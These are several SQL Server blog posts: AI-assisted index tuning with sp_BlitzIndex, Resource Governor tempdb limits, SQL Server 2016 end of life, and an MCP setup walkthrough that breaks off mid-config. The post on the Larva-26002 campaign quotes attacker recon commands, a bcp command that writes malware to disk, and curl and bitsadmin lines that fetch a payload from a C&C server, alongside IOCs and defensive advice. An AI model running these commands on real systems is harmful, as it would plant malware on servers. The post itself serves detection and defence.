Monday, March 30, 2026

Brent Added AI to sp_BlitzIndex. I Had to Try It.

Six posts. That's how long it took me to go from skeptic to convinced on sp_BlitzCache + ChatGPT. If you missed that series, here's the recap: AI diagnosed two real performance problems from a single execution plan in under two minutes — and I stopped resisting AI in SQL Server. Here's the one that changed my mind.

Now Brent has opened the same door for sp_BlitzIndex. The March 2026 First Responder Kit release ships @AI support directly into sp_BlitzIndex. Point it at a table, and it comes back with prioritized index recommendations in Markdown — including the exact creation scripts and the undo scripts. I ran it. Here's what happened.

Before You Run Anything: Two Things to Check

First, if you set up sp_BlitzCache AI on the February 2026 release, you need to stop here. The March release contains a breaking change: the single Blitz_AI config table has been split into two tables to support per-proc AI prompt configurations. Run Brent's migration script before installing the new version.

Second, if you install your procs in a database other than master, and that database is at an older compatibility level, you may see this:

Msg 102, Level 15, State 1, Procedure sp_BlitzIndex, Line 3844
Incorrect syntax near '$.message.content'.

It's not a bug in the FRK. It's a compatibility level issue. The fix is easy: install in the master database or confirm your target database is at compatibility level 150 or higher. Brent suggested this in the comments on his release post, and a commenter confirmed it resolved the error.
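If you want to check before you install, the compatibility level is one query away. Orders is my example database; substitute your own:

```sql
-- Check the compatibility level of the target database
SELECT name, compatibility_level
FROM sys.databases
WHERE name = N'Orders';

-- Raise it to 150 or higher if needed (160 = SQL Server 2022)
ALTER DATABASE [Orders] SET COMPATIBILITY_LEVEL = 160;
```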

Two Modes. One Parameter.

| Parameter | What It Does | Requires |
|---|---|---|
| @AI = 2 | Builds the AI prompt for you to copy/paste into any AI of your choice | Any SQL Server version. No API key. Just a table name. |
| @AI = 1 | Calls ChatGPT or Gemini directly from SQL Server and returns the advice in your result set | SQL Server 2025 or Azure SQL DB. API key configured in the Blitz_AI tables. |

Start with @AI = 2. It lets you see exactly what gets sent to the AI before any data leaves your server. Once you've seen the prompt and are comfortable with what's in it, @AI = 1 makes the actual AI call.

Step 1: @AI = 2 — Build the Prompt

The @TableName parameter is required when using sp_BlitzIndex with @AI. You cannot run it against an entire database. I'm running this against dbo.SalesOrder in my Orders database — one million rows, clustered on the primary key, light on nonclustered indexes. Good candidate for 'missing indexes'.

EXEC dbo.sp_BlitzIndex
    @DatabaseName = 'Orders',
    @SchemaName   = 'dbo',
    @TableName    = 'SalesOrder',
    @AI           = 2;

SSMS Output

We get the standard sp_BlitzIndex output with details for existing and missing indexes, column data types, and foreign keys — plus a new AI Prompt value in the result set (highlighted). That value holds the full prompt sp_BlitzIndex passes to the AI: existing index definitions, SQL Server's own missing index suggestions, column data types, and foreign key relationships. No row data. No query plans. Schema and index metadata only.

This is just a snippet of the AI Prompt but you can see the full output here. Copy the output, paste it into ChatGPT, Gemini, Claude — whatever you use.

What the AI Sent Back

The response came back in Markdown. What I got: a prioritized list of index recommendations with reasoning for each one, an assessment of which SQL Server-suggested missing indexes to take as-is, which to combine, and which to skip, along with the full CREATE INDEX scripts ready to run and the corresponding DROP INDEX undo scripts for every recommendation.

The undo scripts are the part I didn't expect. If you're presenting index changes to a customer, showing up with both the change and the rollback already written is the kind of thing that builds trust fast. I didn't have to write either one.

Step 2: @AI = 1 — Make the Call

I set this up before with sp_BlitzCache, so @AI = 1 is available to me. If you already configured API credentials for sp_BlitzCache, the same setup works here — which is a key point of the new two-table structure. One setup works for both sp_BlitzCache and sp_BlitzIndex. If you haven't set up credentials yet, my BlitzCache setup post walks through the full API key and database-scoped credential process.
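For reference, the credential setup follows the standard sp_invoke_external_rest_endpoint pattern. A hedged sketch, roughly this shape — the endpoint URL and key below are placeholders, and my BlitzCache setup post covers the real walkthrough:

```sql
-- One-time: a master key is required before creating scoped credentials
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<StrongPasswordHere>';

-- The credential name must match the endpoint URL being called
CREATE DATABASE SCOPED CREDENTIAL [https://api.openai.com]
WITH IDENTITY = 'HTTPEndpointHeaders',
     SECRET   = '{"Authorization":"Bearer <YourApiKeyHere>"}';
```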

EXEC dbo.sp_BlitzIndex
    @DatabaseName = 'Orders',
    @SchemaName   = 'dbo',
    @TableName    = 'SalesOrder',
    @AI           = 1;

Same syntax, different @AI value. This time sp_BlitzIndex builds the prompt, calls the API directly via sp_invoke_external_rest_endpoint, and returns the AI's advice in your result set, without you ever leaving SSMS. Notice the difference from @AI = 2: the result set now includes four new columns — AI Advice, AI Prompt, AI Payload, and AI Raw Response.

SSMS Output

The AI Advice column contains the full implementation-ready recommendation. Click into it and you get a prioritized plan: which indexes to drop, which to create, the exact CREATE INDEX and DROP INDEX scripts, and undo scripts for every change. All of it, right there in your SSMS output.

Another snippet, but you can view the full AI Advice output for this run here.

What It's Actually Sending to the AI

Worth understanding before you run this in a client environment. The system prompt Brent baked into sp_BlitzIndex instructs the model to behave like this:

'You are a very senior database developer working with Microsoft SQL Server and Azure SQL DB. You focus on real-world, actionable advice that will make a big difference, quickly. You value everyone's time, and while you are friendly and courteous, you do not waste time with pleasantries or emoji because you work in a fast-paced corporate environment. Do not describe the table: you are working with other very senior database developers who understand SQL Server deeply, so get straight to the point with your recommendations and scripts.'

Kudos to Brent. No pleasantries. No emoji. Just get-to-the-point recommendations and scripts. I respect that. The data payload it sends is: existing index definitions, SQL Server's missing index suggestions, column data types, and foreign keys. No actual data rows leave your server.

That said, if you use a hosted model like ChatGPT or Gemini, your schema metadata is traveling to a cloud endpoint. That means table names, column names, data types and key structure. For most environments, that's acceptable, but if you're in a regulated shop where even schema metadata is sensitive, know that before you run @AI = 1. As Brent said when someone asked him what sensitive information gets to AI: 'Depends on what AI service you choose to use. That's on you, son.'

The Part That Still Requires a Human

Much like I said in my BlitzCache series: AI didn't replace anything. It accelerated the starting point. Every recommendation it returned, I reviewed against the actual workload before touching a production index. SQL Server's own missing index suggestions are notoriously greedy — they optimize for the query that generated them, not for the table as a whole. The AI takes those suggestions as input and applies judgment. This is much better than taking them raw, but still not a substitute for knowing your environment.

What it saved me: Time. The prompt-to-recommendation cycle on a table I already knew took under two minutes. The undo scripts were already written. The Markdown output went straight into a client deliverable without reformatting. That is a true time saver and a real value.

Go Get the March 2026 FRK

Download at brentozar.com/first-aid, or PowerShell:

Install-DbaFirstResponderKit -SqlInstance YourServerName -Database master

If you already set up sp_BlitzCache AI, be sure to run the migration script first or things will break.

Pick a table you already know has index problems. Run it with @AI = 2 first — no risk, just instant results. See what the prompt looks like and what comes back. Then decide if @AI = 1 is worth the API setup for your environment. For me, on SQL Server 2025 with credentials already configured: Yes. Absolutely. Do it.

More to Read:

Updated First Responder Kit for March 2026 — Brent Ozar
Blitz_AI migration script — GitHub Gist
sp_BlitzCache Can Talk to ChatGPT Now. Here's How. — sqlfingers.com
sp_BlitzCache + ChatGPT: I'm Convinced. — sqlfingers.com
sp_invoke_external_rest_endpoint — Microsoft Learn

Thursday, March 26, 2026

Resource Governor in SQL Server 2025. A Good Change.

Someone runs a massive SELECT INTO #temp, tempdb fills the drive, and the entire instance grinds to a halt. You get paged at 2 AM, kill the session, shrink the files, and spend the next day writing a monitoring script that you hope will catch it next time.

SQL Server 2025 finally lets you stay ahead of this. The Resource Governor can now cap how much tempdb space a workload is allowed to consume. Exceed the limit and SQL Server kills the query — not the instance. How cool is that? It's like proactive DBA-ing without the DBA. 😜

What Changed

The Resource Governor has been around since SQL Server 2008, managing CPU, memory, and I/O. Personally, I've always thought it was a bit tedious and somewhat high-maintenance. SQL Server 2025 has added a new option to limit tempdb space consumption that makes things a little more manageable:

| Setting | What It Does |
|---|---|
| GROUP_MAX_TEMPDB_DATA_MB | Hard cap in megabytes on tempdb data space for the group |
| GROUP_MAX_TEMPDB_DATA_PERCENT | Cap as a percentage of max configured tempdb size |

When a query in the managed workload group tries to push past the limit, SQL Server aborts it with error 1138:

Msg 1138, Level 17
Could not allocate a new page for database 'tempdb' because 
that would exceed the limit set for workload group 'default'.

The query dies. The instance lives. End of story.

Step 1: Enable Resource Governor

Resource Governor is disabled by default. Run this to enable it:

ALTER RESOURCE GOVERNOR ENABLE;
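You can confirm it took effect with a quick check (1 = enabled):

```sql
SELECT is_enabled
FROM sys.resource_governor_configuration;
```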

Step 2: Monitor Before You Cap

SQL Server 2025 introduces tempdb usage tracking per workload group. Once Resource Governor is enabled, query the following to establish a baseline before setting any limits:

SELECT
    wg.group_id,
    wg.name AS workload_group,
    rg.group_max_tempdb_data_mb AS cap_mb,
    wg.tempdb_data_space_kb / 1024.0 AS current_mb,
    wg.peak_tempdb_data_space_kb / 1024.0 AS peak_mb,
    wg.total_tempdb_data_limit_violation_count AS violations
FROM sys.dm_resource_governor_workload_groups wg
JOIN sys.resource_governor_workload_groups rg
  ON rg.group_id = wg.group_id;

Watch the peaks. You need to know what your workloads actually consume before you set a cap. Setting a 20 GB limit on an instance where reporting queries routinely spike to 25 GB means you're just going to kill the reporting.

Step 3: Set the Cap

The Resource Governor uses workload groups to classify sessions. Every instance ships with a default workload group, and any session that is not explicitly routed to a named group lands in there. This is how you'd limit the tempdb usage on the default group, which puts a ceiling on every unclassified session on the instance:

ALTER WORKLOAD GROUP [default] WITH (GROUP_MAX_TEMPDB_DATA_MB = 20480);
ALTER RESOURCE GOVERNOR RECONFIGURE;

Or to remove that limit:

ALTER WORKLOAD GROUP [default] WITH (GROUP_MAX_TEMPDB_DATA_MB = NULL);
ALTER RESOURCE GOVERNOR RECONFIGURE;

What It Governs (and What It Does Not)

The Resource Governor tracks tempdb data space only. That includes temp tables, table variables, spools, spills, worktables, and sort space. It does not govern tempdb log space and it does not govern the version store.

For the log side, SQL Server 2025 also added support for Accelerated Database Recovery (ADR) on tempdb, which provides instantaneous transaction rollback and aggressive log truncation. Between tempdb data governance and ADR on tempdb, both sides are now more manageable — but they are two separate features that must be configured separately. NOTE: Enabling ADR on tempdb requires a service restart to take effect.
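If you decide to turn ADR on for tempdb, the syntax is the same ALTER DATABASE option used for user databases — just keep the restart requirement in mind:

```sql
ALTER DATABASE tempdb
SET ACCELERATED_DATABASE_RECOVERY = ON;
-- Takes effect for tempdb only after the instance restarts
```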

The Gotchas

Capping the default workload group is a good start, but not a full solution. If every session lives in the default group, a single query can easily consume the whole cap, leaving everything else with the error 1138 shown above. With mixed workloads, the default group alone is not enough. Reporting and OLTP behave differently under tempdb pressure, and they won't play nicely together. I recommend classifying them into separate user-defined workload groups, each with its own ceiling. This requires a classifier function in master, which is more setup, but very much worth it for environments with mixed workloads. See here: Microsoft Learn.
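As a sketch of what that setup looks like — every name here (rg_reporting, report_svc) is hypothetical, and the classifier function must live in master:

```sql
USE master;
GO
-- Hypothetical group for reporting sessions, with its own tempdb ceiling
CREATE WORKLOAD GROUP rg_reporting
WITH (GROUP_MAX_TEMPDB_DATA_MB = 10240);
GO
-- Classifier: route the reporting login to its group, everyone else to default
CREATE FUNCTION dbo.fn_tempdb_classifier()
RETURNS sysname
WITH SCHEMABINDING
AS
BEGIN
    IF SUSER_SNAME() = N'report_svc'
        RETURN N'rg_reporting';
    RETURN N'default';
END;
GO
ALTER RESOURCE GOVERNOR
WITH (CLASSIFIER_FUNCTION = dbo.fn_tempdb_classifier);
ALTER RESOURCE GOVERNOR RECONFIGURE;
```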

Tempdb file configuration matters if you use the GROUP_MAX_TEMPDB_DATA_PERCENT setting. With this configuration, your tempdb data files need either autogrow disabled or a defined MAXSIZE, or the percentage setting will not be enforced. When the file config requirements are not met, SQL Server silently ignores the limit and issues warning 10989. Also, if you change tempdb file config after setting percent-based limits, SQL Server also doesn't tell you that your cap just changed. Using the MB-based setting allows more predictable behavior. See Tempdb space resource governance on Microsoft Learn.

ADR on tempdb has a known issue. Microsoft has documented that when ADR is enabled on tempdb, and temporary tables are being created and dropped at a high rate, the workload throughput can be substantially reduced due to latch contention on the sys.sysseobjvalues system table. This issue is currently under investigation. If your workload involves heavy temp table churn, you may want to hold off before enabling ADR on tempdb in production. Or at least test extensively before calling it good.

The version store is not governed. If you use Read Committed Snapshot Isolation (RCSI), snapshot isolation, or ADR, the version store will grow independently of your workload group limits. A long-running transaction can fill tempdb through the version store even if every workload group is perfectly capped. The version store size must be monitored separately via sys.dm_db_file_space_usage.
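A quick way to watch it — pages are 8 KB, so the reserved page count converts to MB like this:

```sql
-- Current version store footprint in tempdb, in MB
SELECT SUM(version_store_reserved_page_count) * 8 / 1024.0 AS version_store_mb
FROM tempdb.sys.dm_db_file_space_usage;
```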

The Bottom Line

I can't count the number of times I've seen tempdb fill up its drive. Before SQL Server 2025, the only real options were custom monitoring jobs, alerts — and just hoping that nobody is querying things too ambitiously. Now there is a native kill switch that will let you stay ahead of things.

First, establish good baselines for your hottest sessions. Then enable the Resource Governor and set your cap accordingly. Stop worrying about 2 AM pages for tempdb.

Standard Edition Gets It Now, Too

Even better is that as of SQL Server 2025, Microsoft has moved the Resource Governor from being an Enterprise-only feature to being included in both Standard and Enterprise editions with identical, full capabilities.

More to Read

Tempdb Space Resource Governance — Microsoft Learn
TempDB Filling Up? Try Resource Governor — Brent Ozar
Accelerated Database Recovery — Microsoft Learn
Monitor and Troubleshoot Accelerated Database Recovery — Microsoft Learn
Resource Governor: A New Beginning — Microsoft SQL Server Blog

Wednesday, March 25, 2026

SQL Server 2016: 111 Days. The Last Patch Just Dropped.

On March 10, Microsoft dropped a security patch for SQL Server 2016. It fixed a publicly disclosed, actively scrutinized elevation-of-privilege vulnerability — one that lets any authenticated user escalate straight to sysadmin. Patched. Done. You're safe. For now.

Here's the part that matters most: That patch came with an expiration date. SQL Server 2016 goes end of life on July 14, 2026. That's 111 days from today.

If you're still running SQL Server 2016 in production, this post is for you.

What March 10 Just Told You

This month's Patch Tuesday included three SQL Server elevation-of-privilege vulnerabilities — CVE-2026-21262 (publicly disclosed), CVE-2026-26115, and CVE-2026-26116. SQL Server 2016 got its patch: KB5077474, build 13.0.6480.4.

CVE-2026-21262 is the one worth staring at. Any authenticated database user — not just a DBA, not just a developer — can exploit it to become sysadmin. I wrote about it last week-ish. It's the kind of CVE that belongs on a compliance report, and possibly a very uncomfortable conversation with your manager.

And if you read yesterday's post on the Larva-26002 BCP malware campaign, you already know what the full attack chain looks like once they're in.

Today, you can patch it. After July 14, that option closes. The CVEs keep arriving on schedule, but the patches for SQL Server 2016 are done.

111 Days Is Not as Long as You Think

Walk the calendar backward from July 14. Be honest about your org's real-world timeline.

| Activity | Typical Time Needed |
|---|---|
| Inventory and dependency audit | 1–2 weeks |
| Stakeholder approval and budget sign-off | 2–4 weeks |
| Non-production environment testing | 2–4 weeks |
| Application and vendor compatibility validation | 1–3 weeks |
| Change control and production scheduling | 2–4 weeks |
| Buffer for surprises (plan for them) | 2 weeks minimum |

Add that up and you're at 10–17 weeks. 111 days is just under 16 weeks, which lands near the top of that range. Starting today puts you right on the edge. Starting next month puts you over it.

If you haven't read what technically breaks in a 2016-to-2025 upgrade — linked servers, replication, full-text catalogs, SSIS, connection strings — start there first. The engine upgrade is not the hard part. Discovering what silently fails afterward is.

The Double Deadline Nobody Is Talking About

Here's a small detail that somehow keeps getting buried in the industry coverage: if your SQL Server 2016 is running on Windows Server 2016 — and many are — both products reach end of life on the exact same day. July 14, 2026. Same day. No grace period for either one.

That means you're not scheduling one upgrade. You're scheduling two, on the same hardware, with the same deadline, competing for the same change window. Coordinate them together now and it's one migration project. Ignore it and it becomes two crises in the same week.

If you're not sure whether your SQL Server 2016 instances are sitting on Windows Server 2016, run this:

SELECT 
    @@SERVERNAME               AS server_name,
    @@VERSION                  AS sql_version,
    host_platform,
    host_distribution,
    host_release
FROM sys.dm_os_host_info;

If host_distribution comes back as 'Windows', check @@VERSION — if it says 'Windows Server 2016', you have both problems in one box.

The CVE Conveyor Belt

This number keeps me up at night on behalf of any of my customers still on 2016: 79 CVEs were published against SQL Server 2016 in 2024 alone, and the 2025 batch carried an average CVSS score of 8.4. This is no small thing.

It's not going to slow down after July 14. The researchers and the threat actors definitely aren't checking the EOL calendar. What stops after July 14 is Microsoft's response to what they find. Every vulnerability disclosed after that date becomes a permanent resident in your environment — no patch coming, no timeline, no fix.

To be fair: you can buy your way out of that for a while. Which brings us to the ESU math.

The ESU Trap

Extended Security Updates are Microsoft's 'we'll keep patching it if you keep paying' program. For SQL Server 2016, they're available for up to three additional years past EOL — so through July 2029. But read the fine print before you treat this as a plan.

ESU covers critical security patches only. No bug fixes. No performance improvements. No features. No support calls. And the cost structure is punishing: roughly 75% of your original license cost in year one, doubling each subsequent year. By year three, you may be spending more on ESU than a new license would have cost you when this conversation started.

ESU is a bridge — though a short one — with a toll.

If you're in a regulated industry (PCI-DSS, HIPAA, SOC 2, ISO 27001), there's another wrinkle: those frameworks generally require software to be on a supported, actively patched version. 'We're paying for ESU' may not satisfy your auditors as well as 'We upgraded before the deadline' will.

The Ecosystem Is Already Moving On

Microsoft isn't the only one checking the calendar. Third-party vendors have their own support matrices, and SQL Server 2016 is starting to fall off them.

BMC has already announced that Control-M/EM 9.0.27, planned for October 2026, will no longer support MSSQL 2016 as a backend database, and they won't be the last. Application vendors follow the same lifecycle pressure, and they rarely give more than a product release cycle of notice. By the time your ISV emails you about it, you're probably already behind.

Running an unsupported database version also tends to quietly invalidate software support agreements in ways that only surface when something breaks badly and you need the vendor to help. That's a terrible time to learn your environment does not meet your vendor pre-reqs.

What to Do Right Now

If you haven't started, this is the actual checklist — not the marketing version.

First, find every SQL Server 2016 instance you have. Include everything — even the report server the finance team spun up in 2018 and didn't tell anyone about. This query will tell you what you've got:

SELECT 
    @@SERVERNAME   AS server_name,
    @@VERSION      AS version_string,
    SERVERPROPERTY('ProductVersion')   AS product_version,
    SERVERPROPERTY('ProductLevel')     AS product_level,
    SERVERPROPERTY('Edition')          AS edition;

Anything with a version starting with 13.x is SQL Server 2016. Write them down.

Next, check your linked server providers — because this is the most common place upgrades silently detonate:

SELECT 
    s.name AS linked_server,
    s.provider,
    s.data_source
FROM sys.servers s
WHERE s.is_linked = 1;

Any row showing SQLNCLI or SQLNCLI11 is a problem waiting to happen post-upgrade. SQL Server 2025 ships with MSOLEDBSQL 19, which enforces TLS certificate validation that the old SQL Native Client silently skipped. Those linked servers will fail. Plan for it now, not after your upgrade.
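The fix is to recreate each affected linked server on the modern provider. A hedged sketch — REMOTE1 and remotehost are placeholders, and you'll need to re-add any login mappings afterward:

```sql
-- Drop the old SQLNCLI-based definition (removes its login mappings too)
EXEC master.dbo.sp_dropserver @server = N'REMOTE1', @droplogins = 'droplogins';

-- Recreate it on MSOLEDBSQL
EXEC master.dbo.sp_addlinkedserver
    @server     = N'REMOTE1',
    @srvproduct = N'',
    @provider   = N'MSOLEDBSQL',
    @datasrc    = N'remotehost';
```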

Then — and I cannot stress this enough — test in non-production first. Not just the upgrade. Every downstream connection, every SSIS package, every replication topology, every application connection string. As I said, the engine upgrade itself is typically the easy part. Here's a full breakdown of what will break, and why.

The Bottom Line

SQL Server 2016 just got patched. That's the good news. The better news — if you act on it — is that you still have 111 days to handle things properly, rather than in panic mode.

Every day you wait, the calendar compresses and the options narrow. The organizations that are going to have a bad summer are the ones having this conversation in June. Don't be them.

July 14, 2026. Mark it in red. Then work backwards.

Need help planning the upgrade before the deadline? We do this.

More to Read

sqlfingers: SQL Server 2016 Ends in July. Here's What Will Break.
sqlfingers: Patch Tuesday: Your sysadmin Role Was Up for Grabs
sqlfingers: They Hid Malware in a SQL Table. A Weak Password and BCP Did the Rest.
endoflife.date: Microsoft SQL Server
Microsoft Lifecycle: SQL Server 2016

Tuesday, March 24, 2026

They Hid Malware in a SQL Table. A Weak Password and BCP Did the Rest.

BCP. I love it. It's a workhorse — bulk copy data in, bulk copy data out, no drama. I've used it more times than I can count. Which is exactly why this stopped me cold: AhnLab's Security Intelligence Center (ASEC) published a confirmed attack report on March 20, 2026 showing an active threat group using BCP to drop malware directly onto SQL Server hosts. No software flaw. No zero-day. They got through a weak password on an internet-exposed server — and then they weaponized BCP. The simple tool we've all used, doing exactly what it was designed to do, except the 'data' being exported is a malware executable.

Who Is Behind This

ASEC tracks this group as Larva-26002. They've been targeting MS-SQL servers since at least January 2024 — starting with Trigona and Mimic ransomware against internet-exposed instances. Palo Alto Unit42 and Zscaler covered Trigona. Securonix tied Mimic to Turkish-speaking threat actors. In 2025, the same group came back with upgraded tools — Teramind alongside AnyDesk, and a new scanner rebuilt in Rust. Now it's 2026 and they've upgraded again. Same group, same targets, new tooling. This is a long-running, actively maintained operation.

How They Get In

Brute force and dictionary attacks against internet-exposed SQL Server instances with weak or default credentials. That's it. No exploit chain, no CVE. Just hammering logins until one works. Once inside, they run basic reconnaissance first for situational awareness:

hostname
whoami
ipconfig /all
netstat -an
tasklist
tasklist /FI "IMAGENAME eq sqlservr.exe" /FO CSV /NH

Then the Call to BCP

The attacker stores the malware binary inside a database table and then uses BCP to export it to disk as an executable. This is the exact command ASEC documented:

bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"

Two things to note: the table name uGnzBdZbsi and the format file FODsOZKgAU.txt have not changed since the 2024 incident. ASEC confirmed these identifiers have been consistent across every documented attack cycle from 2024 to date. If you see either of those strings anywhere in your environment, stop whatever you are doing and investigate immediately.

Where BCP isn't available or fails, they fall back to curl, bitsadmin, or PowerShell to pull the payload from an external server:

curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe"
bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"

What Gets Installed

The file being dropped at C:\ProgramData\api.exe is a downloader ASEC labeled 'ICE Cloud Launcher' — written in Go. It authenticates to a command-and-control (C&C) server and pulls down the actual payload: 'ICE Cloud Client,' also Go-based, which drops with a randomized filename to disguise itself as a legitimate program.

ICE Cloud Client is a scanner and brute-force tool. It registers with the C&C server, receives a list of MS-SQL addresses to target along with a credential pair to try — they used ecomm/ecomm — and then successful logins go straight back to the C&C server. Your compromised SQL Server is now their scout.

Also interesting: the strings inside the ICE Cloud binaries are written in Turkish, tying this 2026 campaign squarely to the earlier Mimic ransomware operation.

The Part That Gets Me The Most

ASEC confirmed that in 2026, Larva-26002 attacked the same servers they compromised in 2024. Not similar servers — the same ones. They came back. Servers that were never properly cleaned up are being revisited on a recurring cycle, each time with the group's latest tooling.

Look at that three-year path: ransomware in 2024, Rust-based scanning in 2025, ICE Cloud scanning in 2026. They've moved away from ransomware toward credential scanning at scale, and they're building a hit list. A growing pool of compromised SQL Servers quietly probing for the next victim.

IOCs to Check Right Now

Everything below comes directly from the ASEC report. Confirmed indicators from the active 2026 campaign:

| Type | Value | Notes |
|---|---|---|
| Table name | uGnzBdZbsi | Used to store malware payload since 2024 |
| Format file | FODsOZKgAU.txt | BCP format file, consistent since 2024 |
| Dropped file | C:\ProgramData\api.exe | ICE Cloud Launcher downloader |
| C&C IP | 109.205.211[.]13 | Payload download and C&C server |
| Domain | hostroids[.]com | Associated infrastructure |

MD5 hashes published by ASEC for the malware samples:

0a9f2e2ff98e9f19428da79680e80b77
28847cb6859b8239f59cbf2b8f194770
5200410ec674184707b731b697154522
7fbbf16256c7c89d952fee47b70ea759
89bf428b2d9214a66e2ea78623e8b5c9

What Should You Do?

If your SQL Server has any internet exposure — direct or through an application — start here:

Lock down port 1433.

SQL Server should not be reachable from the open internet. Firewall rules should restrict access to known, trusted IP ranges only. If you're not sure what's exposed, find out today.

Audit your SQL logins.

Default and simple credentials are the entry point. Dictionary attacks mean they're trying common passwords. Disable sa if it's not needed. If you have sa enabled with a weak password, or any login with credentials like ecomm/ecomm, change them immediately. Need to find them first? Here's how to find weak passwords using PWDCOMPARE.
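A minimal sweep using PWDCOMPARE — this checks for logins whose password equals their own name, plus the exact credential pair from this campaign:

```sql
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE(name, password_hash) = 1          -- password = login name
   OR PWDCOMPARE(N'ecomm', password_hash) = 1;     -- the pair used by Larva-26002
```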

Review BCP activity.

BCP is legitimate, but it has no business running unattended on a production server outside of a known, documented process. Check all SQL Server Agent jobs and Windows scheduled tasks for all BCP executions — and then verify each one is intended.
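For the Agent side, a quick search of job step commands gets you the list to verify:

```sql
-- Find every Agent job step that shells out to bcp
SELECT j.name AS job_name, s.step_name, s.command
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s
  ON s.job_id = j.job_id
WHERE s.command LIKE N'%bcp%';
```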

Check for the IOC artifacts.

Search for api.exe in C:\ProgramData\, the table name uGnzBdZbsi, and the format file FODsOZKgAU.txt. These strings have not changed across three years of active attacks. Look. For. Them.
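To sweep every database for the malicious table name, one option is the undocumented (but widely used) sp_MSforeachdb:

```sql
-- '?' is replaced with each database name in turn
EXEC sp_MSforeachdb N'
IF EXISTS (SELECT 1 FROM [?].sys.tables WHERE name = N''uGnzBdZbsi'')
    PRINT ''Found table uGnzBdZbsi in database: ?'';';
```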

If you were compromised before and 'cleaned up' — verify.

ASEC confirmed return visits to previously compromised servers. A cleanup that didn't include closing the original entry point, such as weak credentials or an exposed port, was not a full cleanup.

These aren't sophisticated attackers. They're patient ones. A weak password and an open port is all it took. Don't make it that easy for them.

More to Read

AhnLab ASEC: Attack Targeting MS-SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002) — March 20, 2026
AhnLab ASEC: Larva-26002 Trigona and Mimic Ransomware Campaign — January 2024
AhnLab ASEC: Larva-26002 2025 Campaign (Rust-based scanner)
Palo Alto Unit42: Trigona Ransomware Update
Zscaler: Technical Analysis of Trigona Ransomware
Securonix: Turkish Hackers Target MS-SQL Servers with Mimic Ransomware

SQL MCP Server: From Setup to Live Data

In a previous post, I covered what SQL MCP Server is, why it matters, and why getting the security model right is non-negotiable. If you haven't read that one, please start there. This post is the follow-up where I'll walk through the full setup and usage. We'll install the tools, configure the server, expose a couple of tables, and connect Claude Desktop to query live SQL Server data. It's a simple, beginning-to-end walkthrough.

What you need before you start

Three things:

| Prerequisite | Notes |
|---|---|
| .NET 8 SDK | Required to install the DAB CLI. Download from Microsoft — SDK column, Windows x64 installer. |
| Node.js (LTS) | Required for the mcp-remote bridge. Download from nodejs.org — the LTS button on the left. |
| Claude Desktop | The MCP client. Free download at claude.com/download — Windows version. Requires a paid Claude plan. |

Both .NET and Node.js are safe, standard installs. Neither runs as a background service, neither touches SQL Server, and both coexist cleanly with whatever else is on your machine. Verify them after install:

dotnet --version
node --version

Step 1: Install the Data API Builder CLI

SQL MCP Server ships as part of Data API Builder (DAB), Microsoft's open source engine for exposing SQL Server data as REST, GraphQL, and MCP endpoints. Version 1.7 is what added MCP support. Install it at the command line as a global .NET tool:

dotnet tool install -g Microsoft.DataApiBuilder

You'll see some first-run .NET output, then confirmation. Verify the install:

dab --version

You're looking for version 1.7 or later. Mine is 1.7.90, which is current as of this writing.

Step 2: Create a working folder and initialize the config

DAB is driven entirely by a JSON config file. Create a folder to work in and initialize the config against your SQL Server instance:

mkdir C:\dab-mcp
cd C:\dab-mcp
dab init --database-type mssql --connection-string "Server=SQLFINGERSMINI\V2025;Database=Orders;Trusted_Connection=True;TrustServerCertificate=True;" --config dab-config.json --host-mode development

Regarding that connection string, Windows authentication works fine here. There is no reason to switch to SQL auth just for this. Also, TrustServerCertificate=True is needed for local dev instances without a trusted SSL cert, and --host-mode development enables verbose logging, which you'll want while getting set up.

If it works, you'll see confirmation output in the console and a generated dab-config.json file in your working folder.

Step 3: Add your tables

The config file defines the connection. Now you tell DAB which tables to expose. I'm using an Orders database with two tables — Customer (500K rows) and SalesOrder (1M rows) — both exposed as read-only:

dab add Customer --source dbo.Customer --source.type table --permissions "anonymous:read" --description "Customer records"
dab add SalesOrder --source dbo.SalesOrder --source.type table --permissions "anonymous:read" --description "Sales order records"

One gotcha worth calling out: DAB accepts the dab add command without validating that the table actually exists. I mistyped dbo.SalesOrders with a trailing S, and the server threw an 'Invalid object name' error on startup. Another gotcha: there is no dab remove command. Fixing a typo means opening dab-config.json in a text editor and correcting it by hand. Double-check your object names before you add them.
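
Since there's no remove command, it helps to know which part of dab-config.json you'd be hand-editing: the entities block that the add commands generate. Treat this shape as approximate (it can vary by DAB version); your own generated file is the source of truth:

```json
"entities": {
  "Customer": {
    "source": {
      "object": "dbo.Customer",
      "type": "table"
    },
    "permissions": [
      {
        "role": "anonymous",
        "actions": [ "read" ]
      }
    ]
  }
}
```

Fixing my trailing-S typo meant correcting the source.object value for the SalesOrder entity and restarting the server.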

Step 4: Start the server

dab start

DAB connects to SQL Server, pulls schema for each entity, and starts listening on http://localhost:5000. Keep this command prompt window open — it's your running server. dab start produces a fair amount of output; the last few lines confirm the DAB server is running.

Next, verify that the REST endpoint is working by opening this URL in a browser:

http://localhost:5000/api/Customer

You should get back a JSON payload with Customer records.
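
If you'd rather script the check than eyeball the browser, the response is JSON. This is a hedged sketch: it assumes an OData-style envelope where the rows live under a "value" array, so verify the shape against your own output before relying on it:

```python
import json

# Illustrative parse of a DAB-style REST response. The sample payload
# and the "value" envelope are assumptions; check your actual response.
sample = '{"value": [{"CustomerID": 1, "Name": "Acme Corp"}]}'

payload = json.loads(sample)
for row in payload.get("value", []):
    print(row["CustomerID"], row["Name"])
```

A curl call against http://localhost:5000/api/Customer piped into a parser like this is an easy smoke test to drop into a setup script.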

Now verify the MCP endpoint:

http://localhost:5000/mcp

The browser will show an error response here. That's not a failure — that's the MCP endpoint working correctly. A browser isn't a valid MCP client, so the server rejects the connection because no session handshake was initiated. The endpoint is alive and enforcing the protocol. Good.

Step 5: Connect Claude Desktop

Claude Desktop supports MCP connections through a JSON config file. The tricky part on Windows is finding it — the MSIX-packaged version stores it somewhere non-obvious:

%LOCALAPPDATA%\Packages\Claude_pzs8sxrjxfjjc\LocalCache\Roaming\Claude\claude_desktop_config.json

Once you've found it, open it in Notepad and add an mcpServers block after your existing preferences section:

{
  "preferences": {
    "coworkWebSearchEnabled": true,
